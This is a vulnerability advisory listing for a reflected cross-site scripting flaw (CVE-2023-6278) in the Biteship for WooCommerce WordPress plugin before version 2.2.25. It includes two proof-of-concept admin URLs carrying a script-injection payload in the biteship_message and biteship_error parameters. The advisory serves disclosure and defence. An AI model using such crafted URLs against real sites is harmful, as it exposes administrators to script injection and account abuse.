Lucene search
Enrico Marcolini, Claudio MarchesiniWPEX-ID:DFE5001F-31B9-4DE2-A240-F7F5A992AC49HistoryJan 03, 2024 - 12:00 a.m.
Biteship for WooCommerce < 2.2.25 - Reflected Cross-Site Scripting
2024-01-0300:00:00
Enrico Marcolini, Claudio Marchesini
183
biteship
woocommerce
security issue
cross-site scripting
logged-in admin
crafted urls
Description The plugin does not sanitise and escape the biteship_error and biteship_message parameters before outputting them back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin
Make a logged in admin open one of the URLs below:
https://example.com/wp-admin/admin.php?page=wc-settings&biteship_operation=1&biteship_message=<script>alert(/XSS/)</script>
https://example.com/wp-admin/admin.php?page=wc-settings&biteship_operation=1&biteship_error=<script>alert(/XSS/)</script>Related
cve
cve
CVE-2023-6278
2024-01-29 15:15:09
cvelist
cvelist
nvd
nvd
CVE-2023-6278
2024-01-29 15:15:09
wpvulndb
wpvulndb
Biteship for WooCommerce < 2.2.25 - Reflected Cross-Site Scripting
2024-01-03 00:00:00
prion
prion
Cross site scripting
2024-01-29 15:15:00
6 Medium
AI Score
Confidence
High
0.0005 Low
EPSS
Percentile
17.0%
Related for WPEX-ID:DFE5001F-31B9-4DE2-A240-F7F5A992AC49